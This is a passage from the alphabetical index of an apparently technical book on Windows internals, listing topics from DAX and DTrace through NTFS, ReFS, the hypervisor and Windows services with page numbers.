DAX file alignment, 733–735
DAX mode I/Os, flushing, 731
db command, 102
/debug switch, FsTool, 734
debugger
breakpoints, 87–88
objects, 241–242
!pte extension, 735
!trueref command, 148
Index
865
enclave configuration, dumping
debugging. See also user-mode debugging
object handles, 158
trustlets, 374–375
WoW64 in ARM64 environments, 122–124
decryption process, 715–716
defrag.exe command, 646
defragmentation, NTFS, 643–645
Delete method, 141
Dependency Mini Repository, 255
Desktop object, 129
!devhandles command, 151
\Device directory, 161
device shims, 564
!devnode command, 49
!devobj command, 48
dg command, 4, 7–8
Directory object, 129
disk I/Os, counting, 601
disks, defined, 565. See also DAX (Direct
Access Disks)
dispatcher routine, 121
DLLs
Hvloader.dll, 811
IUM (Isolated User Mode), 371–372
Ntevt.dll, 497
for Wow64, 104–105
DMA (Direct Memory Access), 50, 584–585
DMTF, WMI (Windows Management
Instrumentation), 486, 489
DPC (dispatch or deferred procedure call) inter-
rupts, 54–61, 71. See also software interrupts
DPC Watchdog, 59
dps (dump pointer symbol) command, 102–103
drive-letter name resolution, 620
\Driver directory, 161
driver loading in safe mode, 848–849
driver objects, 451
driver shims, 560–563
\DriverStore(s) directory, 161
dt command, 7, 47
DTrace (dynamic tracing)
ETW provider, 533–534
FBT (Function Boundary Tracing) provider,
531–533
initialization, 529–530
internal architecture, 528–534
overview, 525–527
PID (Process) provider, 531–533
symbol server, 535
syscall provider, 530
type library, 534–535
dtrace command, 527
.dump command, LiveKd, 545
dump files, 546–548
Dump method, 141
.dumpdebug command, 547
Duplicate object service, 136
DVRT (Dynamic Value Relocation Table),
23–24, 26
dx command, 7, 35, 46, 137, 150, 190
Dxgk* objects, 129
dynamic memory, tracing, 532–533
dynamic partitioning, NTFS, 646–647
E
EFI (Extensible Firmware Interface), 777
EFS (Encrypting File System)
architecture, 712
BitLocker encryption offload, 717–718
decryption process, 715–716
described, 640
first-time usage, 713–715
information and key entries, 713
online support, 719–720
overview, 710–712
recovery agents, 714
EFS information, viewing, 716
EIP program counter, 8
enclave configuration, dumping, 379–381
866
Index
encrypted files
encrypted files
backing up, 716–717
copying, 717
encrypting file data, 714–715
encryption NTFS, 640
encryption support, online, 719–720
EnergyTracker object, 130
enhanced timers, 78–81. See also timers
/enum command-line parameter, 786
.enumtag command, 547
Error Reporting. See WER (Windows Error
Reporting)
ETL file, decoding, 514–515
ETW (Event Tracing for Windows). See also trac-
ing dynamic memory
architecture, 500
consuming events, 512–515
events decoding, 513–515
Global logger and autologgers, 521
and high-frequency timers, 68–70
initialization, 501–502
listing processes activity, 510
logger thread, 511–512
overview, 499–500
providers, 506–509
providing events, 509–510
security, 522–525
security registry key, 503
sessions, 502–506
system loggers, 516–521
ETW provider, DTrace (dynamic tracing), 533–534
ETW providers, enumerating, 508
ETW sessions
default security descriptor, 523–524
enumerating, 504–506
ETW_GUID_ENTRY data structure, 507
ETW_REG_ENTRY, 507
EtwConsumer object, 129
EtwRegistration object, 129
Event Log provider DLL, 497
Event object, 128
Event Viewer tool, 288
eventvwr command, 288, 449
ExAllocatePool function, 26
exception dispatching, 85–91
executive mutexes, 196–197
executive objects, 126–130
executive resources, 197–199
exFAT, 606
explicit file I/O, 619–622
export thunk, 117
!exqueue command, 83
F
F5 key, 124, 397
fast I/O, 585–586. See also I/O system
fast mutexes, 196–197
fast repair and check-disk, NTFS recovery sup-
port, 707–710
Fast Startup and hibernation, 840–844
FAT12, FAT16, FAT32, 603–606
FAT64, 606
Fault Reporting process, WER (Windows Error
Reporting), 540
fault tolerance and data redundancy, NTFS,
629–630
FCB (File Control Block), 571
FCB Headers, 201
feature settings and values, 22–23
FEK (File Encryption Key), 711
file data, encrypting, 714–715
file names, NTFS on-disk structure, 664–666
file namespaces, 664
File object, 128
file record numbers, NTFS on-disk structure, 660
file records, NTFS on-disk structure, 661–663
file system drivers, 583
file system formats, 566
file system interfaces, 582–585
File System Virtualization, 248
Index
867
HKEY_PERFORMANCE_TEXT
file systems
CDFS, 602
data-scan sections, 624–625
drivers architecture, 608
exFAT, 606
explicit file I/O, 619–622
FAT12, FAT16, FAT32, 603–606
filter drivers, 626
filter drivers and minifilters, 623–626
filtering named pipes and mailslots, 625
FSDs (file system drivers), 608–617
mapped page writers, 622
memory manager, 622
NTFS file system, 606–607
operations, 618
Process Monitor, 627–628
ReFS (Resilient File System), 608
remote FSDs, 610–617
reparse point behavior, 626
UDF (Universal Disk Format), 603
\FileSystem directory, 161
fill buffers, 17
Filter Manager, 626
FilterCommunicationPort object, 130
FilterConnectionPort object, 130
Flags, 132
flushing mapped files, 595–596
Foreshadow (L1TF) attack, 16
fragmented file, 643
FSCTL (file system control) interface, 688
FSDs (file system drivers), 608–617
FsTool, /debug switch, 734
fsutil resource command, 693
fsutil storagereserve findById command, 687
G
g command, 124, 241
gadgets, 15
GDI/User objects, 126–127. See also
user-mode debugging
GDT (Global Descriptor Table), 2–5
Get-FileStorageTier command, 649
Get-VMPmemController command, 737
Gflags.exe, 554–557
GIT (Generic Interrupt Timer), 67
\GLOBAL?? directory, 161
global flags, 554–557
global namespace, 167
GPA (guest physical address), 17
GPIO (General Purpose Input Output), 51
GSIV (global system interrupt vector), 32, 51
guarded mutexes, 196–197
GUI thread, 96
H
HAM (Host Activity Manager), 244, 249–251
!handle command, 149
Handle count, 132
handle lists, single instancing, 165
handle tables, 146, 149–150
handles
creating maximum number of, 147
viewing, 144–145
hard links, NTFS, 634
hardware indirect branch controls, 21–23
hardware interrupt processing, 32–35
hardware side-channel vulnerabilities, 9–17
hibernation and Fast Startup, 840–844
high-IRQL synchronization, 172–177
hive handles, 410
hives. See also registry
loading, 421
loading and unloading, 408
reorganization, 414–415
HKEY_CLASSES_ROOT, 397–398
HKEY_CURRENT_CONFIG, 400
HKEY_CURRENT_USER subkeys, 395
HKEY_LOCAL_MACHINE, 398–400
HKEY_PERFORMANCE_DATA, 401
HKEY_PERFORMANCE_TEXT, 401
868
Index
HKEY_USERS
HKEY_USERS, 396
HKLM\SYSTEM\CurrentControlSet\Control\
SafeBoot registry key, 848
HPET (High Performance Event Timer), 67
hung program screen, 838
HungAppTimeout, 839
HVCI (Hypervisor Enforced Code Integrity), 358
hybrid code address range table, dumping,
117–118
hybrid shutdown, 843–844
hypercalls and hypervisor TLFS (Top Level
Functional Specification), 299–300
Hyper-V schedulers. See also Windows
hypervisor
classic, 289–290
core, 291–294
overview, 287–289
root scheduler, 294–298
SMT system, 292
hypervisor debugger, connecting, 275–277
hypervisor loader boot module, 811–813
I
IBPB (Indirect Branch Predictor Barrier), 22, 25
IBRS (Indirect Branch Restricted Speculation),
21–22, 25
IDT (interrupt dispatch table), 32–35
!idt command, 34, 38, 46
images starting automatically, 837
Import Optimization and Retpoline, 23–26
indexing facility, NTFS, 633, 679–680
Info mask, 132
Inheritance object service, 136
integrated scheduler, 294
interlocked operations, 172
interrupt control flow, 45
interrupt dispatching
hardware interrupt processing, 32–35
overview, 32
programmable interrupt controller
architecture, 35–38
software IRQLs (interrupt request levels),
38–50
interrupt gate, 32
interrupt internals, examining, 46–50
interrupt objects, 43–50
interrupt steering, 52
interrupt vectors, 42
interrupts
affinity and priority, 52–53
latency, 50
masking, 39
I/O system, components of, 652. See also
Fast I/O
IOAPIC (I/O Advanced Programmable Interrupt
Controller), 32, 36
!ioapic command, 38
IoCompletion object, 128
IoCompletionReserve object, 128
Ionescu, Alex, 28
IRPs (I/O request packets), 567, 583, 585, 619,
621–624, 627, 718
IRQ affinity policies, 53
IRQ priorities, 53
IRQL (interrupt request levels), 347–348.
See also software IRQLs (interrupt request
levels)
!irql command, 41
IRTimer object, 128
iSCSI, booting from, 811
isolation, NTFS on-disk structure, 689–690
ISR (interrupt service routine), 31
IST (Interrupt Stack Table), 7–9
IUM (Isolated User Mode)
overview, 371–372
SDF (Secure Driver Framework), 376
secure companions, 376
secure devices, 376–378
SGRA (System Guard Runtime attestation),
386–390
trustlets creation, 372–375
VBS-based enclaves, 378–386
Index
869
local procedure call
J
jitted blocks, 115, 117
jitting and execution, 121–122
Job object, 128
K
k command, 485
Kali Linus, 247
KeBugCheckEx system function, 32
KEK (Key Exchange Key), 783
kernel. See also Secure Kernel
dispatcher objects, 179–181
objects, 126
spinlocks, 174
synchronization mechanisms, 179
kernel addresses, mapping, 20
kernel debugger
!handle extension, 125
!locks command, 198
searching for open files with, 151–152
viewing handle table with, 149–150
kernel logger, tracing TCP/IP activity with,
519–520
Kernel Patch Protection, 24
kernel reports, WER (Windows Error
Reporting), 551
kernel shims
database, 559–560
device shims, 564
driver shims, 560–563
engine initialization, 557–559
shim database, 559–560
witnessing, 561–563
kernel-based system call dispatching, 97
kernel-mode debugging events, 240
\KernelObjects directory, 161
Key object, 129
keyed events, 194–196
KeyedEvent object, 128
KilsrThunk, 33
KINTERRUPT object, 44, 46
\KnownDlls directory, 161
\KnownDlls32 directory, 161
KPCR (Kernel Processor Control Region), 4
KPRCB fields, timer processing, 72
KPTI (Kernel Page Table Isolation ), 18
KTM (Kernel Transaction Manager), 157, 688
KVA Shadow, 18–21
L
L1TF (Foreshadow) attack, 16
LAPIC (Local Advanced Programmable
Interrupt Controllers), 32
lazy jitter, 119
lazy segment loading, 6
lazy writing
disabling, 595
and write-back caching, 589–595
LBA (logical block address), 589
LCNs (logical cluster numbers), 656–658
leak detections, ReFS (Resilient File System),
761–762
leases, 614–615, 617
LFENCE, 23
LFS (log file service), 652, 695–697
line-based versus message signaled-based
interrupts, 50–66
link tracking, NTFS, 639
link.exe tool, 117, 379
link.exe/dump/loadconfig command, 379
LiveKd, .dump command, 545
load ports, 17
loader issues, troubleshooting, 556–557
Loader Parameter block, 819–821
local namespace, 167
local procedure call
ALPC direct event attribute, 222
ALPC port ownership, 220
asynchronous operation, 214–215
attributes, 216–217
blobs, handles, and resources, 217–218
870
Index
local procedure call
local procedure call (continued)
connection model, 210–212
debugging and tracing, 222–224
handle passing, 218–219
message model, 212–214
overview, 209–210
performance, 220–221
power management, 221
security, 219–220
views, regions, and sections, 215–216
Lock, 132
!locks command, kernel debugger, 198
log record types, NTFS recovery support,
697–699
$LOGGED_UTILITY_STREAM attribute, 663
logging implementation, NTFS on-disk struc-
ture, 693
Low-IRQL synchronization. See also
synchronization
address-based waits, 202–203
condition variables, 205–206
critical sections, 203–204
data structures, 184–194
executive resources, 197–202
kernel dispatcher objects, 179–181
keyed events, 194–196
mutexes, 196–197
object-less waiting (thread alerts), 183–184
overview, 177–179
run once initialization, 207–208
signalling objects, 181–183
(SRW) Slim Reader/Writer locks, 206–207
user-mode resources, 205
LRC parity and RAID 6, 773
LSASS (Local Security Authority Subsystem
Service) process, 453, 465
LSN (logical sequence number), 570
M
mailslots and named pipes, filtering, 625
Make permanent/temporary object service, 136
mapped files, flushing, 595–596
mapping and pinning interfaces, caching
with, 584
masking interrupts, 39
MBEC (Mode Base Execution Controls), 93
MDL (Memory Descriptor List), 220
MDS (Microarchitectural Data Sampling), 17
Measured Boot, 801–805
media mixer, creating, 165
Meltdown attack, 14, 18
memory, sharing, 171
memory hierarchy, 10
memory manager
modified and mapped page writer, 622
overview, 567
page fault handler, 622–623
memory partitions support, 571–572
metadata
defined, 566, 570
metadata logging, NTFS recovery support, 695
MFT (Master File Table)
NTFS metadata files in, 657
NTFS on-disk structure, 656–660
record for small file, 661
MFT file records, 668–669
MFT records, compressed file, 674
Microsoft Incremental linker ((link.exe)), 117
minifilter driver, Process Monitor, 627–628
Minstore architecture, ReFS (Resilient File
System), 740–742
Minstore I/O, ReFS (Resilient File System),
746–748
Minstore write-ahead logging, 758
Modern Application Model, 249, 251, 262
modern boot menu, 832–833. See also boot
process
MOF (Managed Object Format), WMI
(Windows Management Instrumentation),
488–495
MPS (Multiprocessor Specification), 35
Msconfig utility, 837
Index
871
NTFS recovery support
MSI (message signaled interrupts), 50–66
msinfo32 command, 312, 344
MSRs (model specific registers), 92
Mutex object, 128
mutexes, fast and guarded, 196–197
mutual exclusion, 170
N
named pipes and mailslots, filtering, 625
namespace instancing, viewing, 169
\NLS directory, 161
nonarchitectural system service dispatching,
96–97
nonsparse data, compressing, 673–674
notepad.exe command, 405
notifications. See WNF (Windows Notification
Facility)
NT kernel, 18–19, 22
Ntdll version list, 106
Ntevt.dll, 497
NTFS bad-cluster recovery, 703–706
NTFS file system
advanced features, 630
change logging, 637–638
compression and sparse files, 637
data redundancy, 629–630
data streams, 631–632
data structures, 654
defragmentation, 643–646
driver, 652–654
dynamic bad-cluster remapping, 633
dynamic partitioning, 646–647
encryption, 640
fault tolerance, 629–630
hard links, 634
high-end requirements, 628
indexing facility, 633
link tracking, 639
metadata files in MFT, 657
overview, 606–607
per-user volume quotas, 638–639
POSIX deletion, 641–643
recoverability, 629
recoverable file system support, 570
and related components, 653
security, 629
support for tiered volumes, 647–651
symbolic links and junctions, 634–636
Unicode-based names, 633
NTFS files, attributes for, 662–663
NTFS information, viewing, 660
NTFS MFT working set enhancements, 571
NTFS on-disk structure
attributes, 667–670
change journal file, 675–679
clusters, 655–656
consolidated security, 682–683
data compression and sparse files, 670–674
on-disk implementation, 691–693
file names, 664–666
file record numbers, 660
file records, 661–663
indexing, 679–680
isolation, 689–690
logging implementation, 693
master file table, 656–660
object IDs, 681
overview, 654
quota tracking, 681–682
reparse points, 684–685
sparse files, 675
Storage Reserves and reservations, 685–688
transaction support, 688–689
transactional APIs, 690
tunneling, 666–667
volumes, 655
NTFS recovery support
analysis pass, 700
bad clusters, 703–706
check-disk and fast repair, 707–710
design, 694–695
LFS (log file service), 695–697
872
Index
NTFS recovery support
NTFS recovery support (continued)
log record types, 697–699
metadata logging, 695
recovery, 699–700
redo pass, 701
self-healing, 706–707
undo pass, 701–703
NTFS reservations and Storage Reserves,
685–688
Ntoskrnl and Winload, 818
NVMe (Non-volatile Memory disk), 565
O
!object command, 137–138, 151, 223
Object Create Info, 132
object handles, 146, 158
object IDs, NTFS on-disk structure, 681
Object Manager
executive objects, 127–130
overview, 125–127
resource accounting, 159
symbolic links, 166–170
Object type index, 132
object-less waiting (thread alerts), 183–184
objects. See also base named objects; private
objects; reserve objects
directories, 160–165
filtering, 170
flags, 134–135
handles and process handle table, 143–152
headers and bodies, 131–136
methods, 140–143
names, 159–160
reserves, 152–153
retention, 155–158
security, 153–155
services, 136
signalling, 181–183
structure, 131
temporary and permanent, 155
types, 126, 136–140
\ObjectTypes directory, 161
ODBC (Open Database Connectivity),
WMI (Windows Management
Instrumentation), 488
Okay to close method, 141
on-disk implementation, NTFS on-disk
structure, 691–693
open files, searching for, 151–152
open handles, viewing, 144–145
Open method, 141
Openfiles/query command, 126
oplocks and FSDs, 611–612, 616
Optimize Drives tool, 644–645
OS/2 operating system, 130
out-of-order execution, 10–11
P
packaged applications. See also apps
activation, 259–264
BI (Background Broker Infrastructure),
256–258
bundles, 265
Centennial, 246–249
Dependency Mini Repository, 255
Host Activity Manager, 249–251
overview, 243–245
registration, 265–266
scheme of lifecycle, 250
setup and startup, 258
State Repository, 251–254
UWP, 245–246
page table, ReFS (Resilient File System),
745–746
PAN (Privileged Access Neven), 57
Parse method, 141
Partition object, 130
partitions
caching and file systems, 565
defined, 565
Pc Reset, 845
PCIDs (Process-Context Identifiers), 20
Index
873
ReFS (Resilient File System)
PEB (process environment block), 104
per-file cache data structures, 579–582
perfmon command, 505, 519
per-user volume quotas, NTFS, 638–639
PFN database, physical memory removed
from, 286
PIC (Programmable Interrupt Controller), 35–38
!pic command, 37
pinning and mapping interfaces, caching
with, 584
pinning the bucket, ReFS (Resilient File
System), 743
PIT (Programmable Interrupt Timer), 66–67
PM (persistent memory), 736
Pointer count field, 132
pop thunk, 117
POSIX deletion, NTFS, 641–643
PowerRequest object, 129
private objects, looking at, 163–164.
See also objects
Proactive Scan maintenance task, 708–709
!process command, 190
Process Explorer, 58, 89–91, 144–145, 147,
153–154, 165 169
Process Monitor, 591–594, 627–628, 725–728
Process object, 128, 137
processor execution model, 2–9
processor selection, 73–75
processor traps, 33
Profile object, 130
PSM (Process State Manager), 244
!pte extension of debugger, 735
PTEs (Page table entries), 16, 20
push thunk, 117
pushlocks, 200–202
Q
!qlocks command, 176
Query name method, 141
Query object service, 136
Query security object service, 136
queued spinlocks, 175–176
quota tracking, NTFS on-disk structure,
681–682
R
RAID 6 and LRC parity, 773
RAM (Random Access Memory), 9–11
RawInputManager object, 130
RDCL (Rogue Data Cache load), 14
Read (R) access, 615
read-ahead and write-behind
cache manager disk I/O accounting,
600–601
disabling lazy writing, 595
dynamic memory, 599–600
enhancements, 588–589
flushing mapped files, 595–596
forcing cache to write through disk, 595
intelligent read-ahead, 587–588
low-priority lazy writes, 598–599
overview, 586–587
system threads, 597–598
write throttling, 596–597
write-back caching and lazy writing,
589–594
reader/writer spinlocks, 176–177
ReadyBoost driver service settings, 810
ReadyBoot, 835–836
Reconciler, 419–420
recoverability, NTFS, 629
recoverable file system support, 570
recovery, NTFS recovery support, 699–700.
See also WinRE (Windows Recovery
Environment)
redo pass, NTFS recovery support, 701
ReFS (Resilient File System)
allocators, 743–745
architecture’s scheme, 749
B+ tree physical layout, 742–743
compression and ghosting, 769–770
container compaction, 766–769
874
Index
ReFS (Resilient File System)
ReFS (Resilient File System) (continued)
data integrity scanner, 760
on-disk structure, 751–752
file integrity streams, 760
files and directories, 750
file’s block cloning and spare VDL, 754–757
leak detections, 761–762
Minstore architecture, 740–742
Minstore I/O, 746–748
object IDs, 752–753
overview, 608, 739–740, 748–751
page table, 745–746
pinning the bucket, 743
recovery support, 759–761
security and change journal, 753–754
SMR (shingled magnetic recording) vol-
umes, 762–766
snapshot support through HyperV, 756–757
tiered volumes, 764–766
write-through, 757–758
zap and salvage operations, 760
ReFS files, cloning, 755
!reg openkeys command, 417
regedit.exe command, 468, 484, 542
registered file systems, 613–614
registry. See also hives
application hives, 402–403
cell data types, 411–412
cell maps, 413–414
CLFS (common logging file system), 403–404
data types, 393–394
differencing hives, 424–425
filtering, 422
hive structure, 411–413
hives, 406–408
HKEY_CLASSES_ROOT, 397–398
HKEY_CURRENT_CONFIG, 400
HKEY_CURRENT_USER subkeys, 395
HKEY_LOCAL_MACHINE, 398–400
HKEY_PERFORMANCE_DATA, 401
HKEY_PERFORMANCE_TEXT, 401
HKEY_USERS, 396
HKLM\SYSTEM\CurrentControlSet\Control\
SafeBoot key, 848
incremental logging, 419–421
key control blocks, 417–418
logical structure, 394–401
modifying, 392–393
monitoring activity, 404
namespace and operation, 415–418
namespace redirection, 423
optimizations, 425–426
Process Monitor, 405–406
profile loading and unloading, 397
Reconciler, 419–420
remote BCD editing, 398–399
reorganization, 414–415
root keys, 394–395
ServiceGroupOrder key, 452
stable storage, 418–421
startup and process, 408–414
symbolic links, 410
TxR (Transactional Registry), 403–404
usage, 392–393
User Profiles, 396
viewing and changing, 391–392
virtualization, 422–425
RegistryTransaction object, 129
reparse points, 626, 684–685
reserve objects, 152–153. See also objects
resident and nonresident attributes, 667–670
resource manager information, querying,
692–693
Resource Monitor, 145
Restricted User Mode, 93
Retpoline and Import optimization, 23–26
RH (Read-Handle) access, 615
RISC (Reduced Instruction Set Computing), 113
root directory (\), 692
\RPC Control directory, 161
RSA (Rivest-Shamir-Adleman) public key
algorithm, 711
Index
875
side-channel attacks
RTC (Real Time Clock), 66–67
run once initialization, 207–208
Runas command, 397
runtime drivers, 24
RW (Read-Write) access, 615
RWH (Read-Write-Handle) access, 615
S
safe mode, 847–850
SCM (Service Control Manager)
network drive letters, 450
overview, 446–449
and Windows services, 426–428
SCM Storage driver model, 722
SCP (service control program), 426–427
SDB (shim database), 559–560
SDF (Secure Driver Framework), 376
searching for open files, 151–152
SEB (System Events Broker), 226, 238
second-chance notification, 88
Section object, 128
sectors
caching and file systems, 565
and clusters on disk, 566
defined, 565
secure boot, 781–784
Secure Kernel. See also kernel
APs (application processors) startup,
362–363
control over hypercalls, 349
hot patching, 368–371
HVCI (Hypervisor Enforced Code
Integrity), 358
memory allocation, 367–368
memory manager, 363–368
NAR data structure, 365
overview, 345
page identity/secure PFN database,
366–367
secure intercepts, 348–349
secure IRQLs, 347–348
secure threads and scheduling, 356–358
Syscall selector number, 354
trustlet for normal call, 354
UEFI runtime virtualization, 358–360
virtual interrupts, 345–348
VSM startup, 360–363
VSM system calls, 349–355
Secure Launch, 816–818
security consolidation, NTFS on-disk structure,
682–683
Security descriptor field, 132
\Security directory, 161
Security method, 141
security reference monitor, 153
segmentation, 2–6
self-healing, NTFS recovery support, 706–707
Semaphore object, 128
service control programs, 450–451
service database, organization of, 447
service descriptor tables, 100–104
ServiceGroupOrder registry key, 452
services logging, enabling, 448–449
session namespace, 167–169
Session object, 130
\Sessions directory, 161
Set security object service, 136
/setbootorder command-line parameter, 788
Set-PhysicalDisk command, 774
SGRA (System Guard Runtime attestation),
386–390
SGX, 16
shadow page tables, 18–20
shim database, 559–560
shutdown process, 837–840
SID (security identifier), 162
side-channel attacks
L1TF (Foreshadow), 16
MDS (Microarchitectural Data Sampling), 17
Meltdown, 14
Spectre, 14–16
SSB (speculative store bypass), 16
876
Index
Side-channel mitigations in Windows
Side-channel mitigations in Windows
hardware indirect branch controls, 21–23
KVA Shadow, 18–21
Retpoline and import optimization, 23–26
STIPB pairing, 26–30
Signal an object and wait for another service, 136
Sihost process, 834
\Silo directory, 161
SKINIT and Secure Launch, 816, 818
SkTool, 28–29
SLAT (Second Level Address Translation) table, 17
SMAP (Supervisor Mode Access Protection),
57, 93
SMB protocol, 614–615
SMP (symmetric multiprocessing), 171
SMR (shingled magnetic recording) volumes,
762–763
SMR disks tiers, 765–766
Smss user-mode process, 830–835
SMT system, 292
software interrupts. See also DPC (dispatch or
deferred procedure call) interrupts
APCs (asynchronous procedure calls), 61–66
DPC (dispatch or deferred procedure call),
54–61
overview, 54
software IRQLs (interrupt request levels), 38–
50. See also IRQL (interrupt request levels)
Spaces. See Storage Spaces
sparse data, compressing, 671–672
sparse files
and data compression, 670–671
NTFS on-disk structure, 675
Spectre attack, 14–16
SpecuCheck tool, 28–29
SpeculationControl PowerShell script, 28
spinlocks, 172–177
Spot Verifier service, NTFS recovery support, 708
spurious traps, 31
SQLite databases, 252
SRW (Slim Read Writer) Locks, 178, 195, 205–207
SSB (speculative store bypass), 16
SSBD (Speculative Store Bypass Disable), 22
SSD (solid-state disk), 565, 644–645
SSD volume, retrimming, 646
Startup Recovery tool, 846
Startup Repair, 845
State Repository, 251–252
state repository, witnessing, 253–254
STIBP (Single Thread Indirect Branch
Predictors), 22, 25–30
Storage Reserves and NTFS reservations,
685–688
Storage Spaces
internal architecture, 771–772
overview, 770–771
services, 772–775
store buffers, 17
stream-based caching, 569
structured exception handling, 85
Svchost service splitting, 467–468
symbolic links, 166
symbolic links and junctions, NTFS, 634–637
SymbolicLink object, 129
symmetric encryption, 711
synchronization. See also Low-IRQL
synchronization
High-IRQL, 172–177
keyed events, 194–196
overview, 170–171
syscall instruction, 92
system call numbers, mapping to functions and
arguments, 102–103
system call security, 99–100
system call table compaction, 101–102
system calls and exception dispatching, 122
system crashes, consequences of, 421
System Image Recover, 845
SYSTEM process, 19–20
System Restore, 845
system service activity, viewing, 104
system service dispatch table, 96
Index
877
trap dispatching
system service dispatcher, locating, 94–95
system service dispatching, 98
system service handling
architectural system service dispatching,
92–95
overview, 91
system side-channel mitigation status,
querying, 28–30
system threads, 597–598
system timers, listing, 74–75. See also timers
system worker threads, 81–85
T
take state segments, 6–9
Task Manager, starting, 832
Task Scheduler
boot task master key, 478
COM interfaces, 486
initialization, 477–481
overview, 476–477
Triggers and Actions, 478
and UBPM (Unified Background Process
Manager), 481–486
XML descriptor, 479–481
task scheduling and UBPM, 475–476
taskschd.msc command, 479, 484
TBOOT module, 806
TCP/IP activity, tracing with kernel logger,
519–520
TEB (Thread Environment Block), 4–5, 104
Terminal object, 130
TerminalEventQueue object, 130
thread alerts (object-less waiting), 183–184
!thread command, 75, 190
thread-local register effect, 4. See also
Windows threads
thunk kernel routines, 33
tiered volumes. See also volumes
creating maximum number of, 774–775
support for, 647–651
Time Broker, 256
timer coalescing, 76–77
timer expiration, 70–72
timer granularity, 67–70
timer lists, 71
Timer object, 128
timer processing, 66
timer queuing behaviors, 73
timer serialization, 73
timer tick distribution, 75–76
timer types
and intervals, 66–67
and node collection indices, 79
timers. See also enhanced timers; system timers
high frequency, 68–70
high resolution, 80
TLB flushing algorithm, 18, 20–21, 272
TmEn object, 129
TmRm object, 129
TmTm object, 129
TmTx object, 129
Token object, 128
TPM (Trusted Platform Module), 785, 800–801
TPM measurements, invalidating, 803–805
TpWorkerFactory object, 129
TR (Task Register), 6, 32
Trace Flags field, 132
tracing dynamic memory, 532–533. See also
DTrace (dynamic tracing); ETW (Event
Tracing for Windows)
transaction support, NTFS on-disk structure,
688–689
transactional APIs, NTFS on-disk structure, 690
transactions
committing, 697
undoing, 702
transition stack, 18
trap dispatching
exception dispatching, 85–91
interrupt dispatching, 32–50
line-based interrupts, 50–66
message signaled-based interrupts, 50–66
878
Index
trap dispatching
trap dispatching (continued)
overview, 30–32
system service handling, 91–104
system worker threads, 81–85
timer processing, 66–81
TRIM commands, 645
troubleshooting Windows loader issues,
556–557
!trueref debugger command, 148
trusted execution, 805–807
trustlets
creation, 372–375
debugging, 374–375
secure devices, 376–378
Secure Kernel and, 345
secure system calls, 354
VBS-based enclaves, 378
in VTL 1, 371
Windows hypervisor on ARM64, 314–315
TSS (Task State Segment), 6–9
.tss command, 8
tunneling, NTFS on-disk structure, 666–667
TxF APIs, 688–690
$TXF_DATA attribute, 691–692
TXT (Trusted Execution Technology), 801,
805–807, 816
type initializer fields, 139–140
type objects, 131, 136–140
U
UBPM (Unified Background Process Manager),
481–486
UDF (Universal Disk Format), 603
UEFI boot, 777–781
UEFI runtime virtualization, 358–363
UMDF (User-Mode Driver Framework), 209
\UMDFCommunicationPorts directory, 161
undo pass, NTFS recovery support, 701–703
unexpected traps, 31
Unicode-based names, NTFS, 633
user application crashes, 537–542
User page tables, 18
UserApcReserve object, 130
user-issued system call dispatching, 98
user-mode debugging. See also debugging;
GDI/User objects
kernel support, 239–240
native support, 240–242
Windows subsystem support, 242–243
user-mode resources, 205
UWP (Universal Windows Platform)
and application hives, 402
application model, 244
bundles, 265
and SEB (System Event Broker), 238
services to apps, 243
UWP applications, 245–246, 259–260
V
VACBs (virtual address control blocks), 572,
576–578, 581–582
VBO (virtual byte offset), 589
VBR (volume boot record), 657
VBS (virtualization-based security)
detecting, 344
overview, 340
VSM (Virtual Secure Mode), 340–344
VTLs (virtual trust levels), 340–342
VCNs (virtual cluster numbers), 656–658,
669–672
VHDPMEM image, creating and mounting,
737–739
virtual block caching, 569
virtual PMs architecture, 736
virtualization stack
deferred commit, 339
EPF (enlightened page fault), 339
explained, 269
hardware support, 329–335
hardware-accelerated devices, 332–335
memory access hints, 338
memory-zeroing enlightenments, 338
Index
879
Windows hypervisor
overview, 315
paravirtualized devices, 331
ring buffer, 327–329
VA-backed virtual machines, 336–340
VDEVs (virtual devices), 326–327
VID driver and memory manager, 317
VID.sys (Virtual Infrastructure Driver), 317
virtual IDE controller, 330
VM (virtual machine), 318–322
VM manager service and worker processes,
315–316
VM Worker process, 318–322, 330
VMBus, 323–329
VMMEM process, 339–340
Vmms.exe (virtual machine manager ser-
vice), 315–316
VM (View Manager), 244
VMENTER event, 268
VMEXIT event, 268, 330–331
\VmSharedMemory directory, 161
VMXROOT mode, 268
volumes. See also tiered volumes
caching and file systems, 565–566
defined, 565–566
NTFS on-disk structure, 655
setting repair options, 706
VSM (Virtual Secure Mode)
overview, 340–344
startup policy, 813–816
system calls, 349–355
VTLs (virtual trust levels), 340–342
W
wait block states, 186
wait data structures, 189
Wait for a single object service, 136
Wait for multiple objects service, 136
wait queues, 190–194
WaitCompletionPacket object, 130
wall time, 57
Wbemtest command, 491
Wcifs (Windows Container Isolation minifilter
driver), 248
Wcnfs (Windows Container Name
Virtualization minifilter driver), 248
WDK (Windows Driver Kit), 392
WER (Windows Error Reporting)
ALPC (advanced local procedure call), 209
AeDebug and AeDebugProtected root
keys, 540
crash dump files, 543–548
crash dump generation, 548–551
crash report generation, 538–542
dialog box, 541
Fault Reporting process, 540
implementation, 536
kernel reports, 551
kernel-mode (system) crashes, 543–551
overview, 535–537
process hang detection, 551–553
registry settings, 539–540
snapshot creation, 538
user application crashes, 537–542
user interface, 542
Windows 10 Creators Update (RS2), 571
Windows API, executive objects, 128–130
Windows Bind minifilter driver, (BindFit) 248
Windows Boot Manager, 785–799
BCD objects, 798
\Windows directory, 161
Windows hypervisor. See also Hyper-V
schedulers
address space isolation, 282–285
AM (Address Manager), 275, 277
architectural stack, 268
on ARM64, 313–314
boot virtual processor, 277–279
child partitions, 269–270, 323
dynamic memory, 285–287
emulation of VT-x virtualization extensions,
309–310
enlightenments, 272
880
Index
Windows hypervisor
Windows hypervisor (continued)
execution vulnerabilities, 282
Hyperclear mitigation, 283
intercepts, 300–301
memory manager, 279–287
nested address translation, 310–313
nested virtualization, 307–313
overview, 267–268
partitions, processes, threads, 269–273
partitions physical address space, 281–282
PFN database, 286
platform API and EXO partitions, 304–305
private address spaces/memory zones, 284
process data structure, 271
processes and threads, 271
root partition, 270, 277–279
SLAT table, 281–282
startup, 274–279
SynIC (synthetic interrupt controller),
301–304
thread data structure, 271
VAL (VMX virtualization abstraction layer),
274, 279
VID driver, 272
virtual processor, 278
VM (Virtualization Manager), 278
VM_VP data structure, 278
VTLs (virtual trust levels), 281
Windows hypervisor loader (Hvloader), BCD
options, 796–797
Windows loader issues, troubleshooting,
556–557
Windows Memory Diagnostic Tool, 845
Windows OS Loader, 792–796, 808–810
Windows PowerShell, 774
Windows services
accounts, 433–446
applications, 426–433
autostart startup, 451–457
